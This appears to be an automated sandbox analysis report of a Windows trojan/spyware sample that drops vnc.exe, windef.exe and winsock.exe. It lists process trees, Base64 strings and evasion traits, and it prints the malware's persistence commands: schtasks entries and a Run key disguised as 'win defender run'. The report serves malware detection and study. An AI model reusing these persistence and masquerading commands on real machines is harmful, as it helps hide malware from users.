Windows Analysis Report CVbJSUXraQ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@33/5@3/3

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: winsock.exe.6.dr, u1802???????????????????.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: winsock.exe.6.dr, u1802???????????????????.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.2.windef.exe.f10000.0.unpack, u1802???????????????????.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.2.windef.exe.f10000.0.unpack, u1802???????????????????.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 6.0.windef.exe.f10000.0.unpack, u1802???????????????????.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 6.0.windef.exe.f10000.0.unpack, u1802???????????????????.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00E1A06A GetLastError,FormatMessageW,

1_2_00E1A06A

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

1_2_00DB4E89

Source: CVbJSUXraQ.exe	Virustotal: Detection: 73%
Source: CVbJSUXraQ.exe	Metadefender: Detection: 68%
Source: CVbJSUXraQ.exe	ReversingLabs: Detection: 86%

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

File read: C:\Users\user\Desktop\CVbJSUXraQ.exe

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe 'C:\Users\user\Desktop\CVbJSUXraQ.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\windef.exe C:\Users\user\AppData\Local\Temp\windef.exe
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Roaming\SubDir\winsock.exe' /rl HIGHEST /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F	Jump to behavior

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

File created: C:\Users\user\AppData\Local\Temp\vnc.exe

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00E13C55 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

1_2_00E13C55

Source: winsock.exe.6.dr, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs	Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='
Source: 6.0.windef.exe.f10000.0.unpack, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs	Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='
Source: 6.2.windef.exe.f10000.0.unpack, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs	Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Mutant created: \Sessions\1\BaseNamedObjects\runas
Source: C:\Windows\System32\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{41435A30-AC43-1BEB-BE05-A07FD209D423}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A8AD8678-FDF622E2-FED71C3E8
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Mutant created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_0kBRNrRz5TDLEQouI0

Source: C:\Users\user\AppData\Local\Temp\windef.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: CVbJSUXraQ.exe

Static file information: File size 2111264 > 1048576

Source: CVbJSUXraQ.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x13a800

Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: CVbJSUXraQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: CVbJSUXraQ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ntdll.pdb source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp

Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: CVbJSUXraQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DD8945 push ecx; ret	1_2_00DD8958
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00AB103B push ecx; ret	4_2_00AB104B
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ABE0BC push ecx; ret	4_2_00ABE0CC
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ADEAA9 push cs; iretd	4_2_00ADEAB8
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ADEA73 push cs; ret	4_2_00ADEA88
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Code function: 4_2_00ADE3DD push es; iretd	4_2_00ADE3EC
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00CA2D0C push ecx; ret	5_2_00CA2D1C
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Code function: 6_2_00F125B2 push esi; ret	6_2_00F125CF
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DD8945 push ecx; ret	7_2_00DD8958
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC4257 push edi; ret	7_2_00DC4259
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DC426B push edi; ret	7_2_00DC426D
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0041A068 push 0041A08Eh; ret	7_2_0041A086
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0041A02C push 0041A05Ch; ret	7_2_0041A054
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E8D0 push 0040E905h; ret	7_2_0040E8FD
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040B164 push 0040B190h; ret	7_2_0040B188
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E908 push 0040E94Ah; ret	7_2_0040E942
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040B12C push 0040B158h; ret	7_2_0040B150
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040C136 push 0040C164h; ret	7_2_0040C15C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040C138 push 0040C164h; ret	7_2_0040C15C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040813C push 00408174h; ret	7_2_0040816C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004171E8 push 00417214h; ret	7_2_0041720C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040C9EA push 0040CA18h; ret	7_2_0040CA10
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040C9EC push 0040CA18h; ret	7_2_0040CA10
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E1A4 push 0040E1D0h; ret	7_2_0040E1C8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040B1B8 push 0040B1E4h; ret	7_2_0040B1DC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E25A push 0040E288h; ret	7_2_0040E280
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040E25C push 0040E288h; ret	7_2_0040E280
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00414A28 push 00414A84h; ret	7_2_00414A7C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0040BAB8 push 0040BAE4h; ret	7_2_0040BADC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00409B54 push 00409BC8h; ret	7_2_00409BC0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00409B78 push 00409BC8h; ret	7_2_00409BC0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB4B37 LoadLibraryA,GetProcAddress,

PE file contains an invalid checksum

Source: windef.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x60aad
Source: SystemPropertiesPerformance.exe.1.dr	Static PE information: real checksum: 0x110ada should be: 0x208fb2
Source: winsock.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x60aad
Source: vnc.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x657b3
Source: CVbJSUXraQ.exe	Static PE information: real checksum: 0x110ada should be: 0x209217
Source: vnc.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x657b3

Persistence and Installation Behavior:

Drops PE files

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Jump to dropped file
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File created: C:\Users\user\AppData\Local\Temp\vnc.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	File created: C:\Users\user\AppData\Local\Temp\windef.exe
Source: C:\Users\user\AppData\Local\Temp\windef.exe	File created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F

Source: C:\Users\user\AppData\Local\Temp\windef.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run win defender run			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run win defender run			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (31).png

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49743 -> 8000

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Local\Temp\windef.exe	File opened: C:\Users\user\AppData\Local\Temp\windef.exe:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	File opened: C:\Users\user\AppData\Roaming\SubDir\winsock.exe:Zone.Identifier read attributes \| delete			Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	1_2_00DB48D7
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C83CC0 IsIconic,GetLastActivePopup,OpenClipboard,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,	5_2_00C83CC0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C8143C IsIconic,GetLastActivePopup,	5_2_00C8143C
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C821C8 IsIconic,	5_2_00C821C8
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7CDE8 IsIconic,memset,GetWindow,GetWindow,	5_2_00C7CDE8
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7B764 GetWindowLongPtrA,IsIconic,	5_2_00C7B764
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	7_2_00DB48D7
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	10_2_00A448D7

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 7_2_00DD3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_00DD3187

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
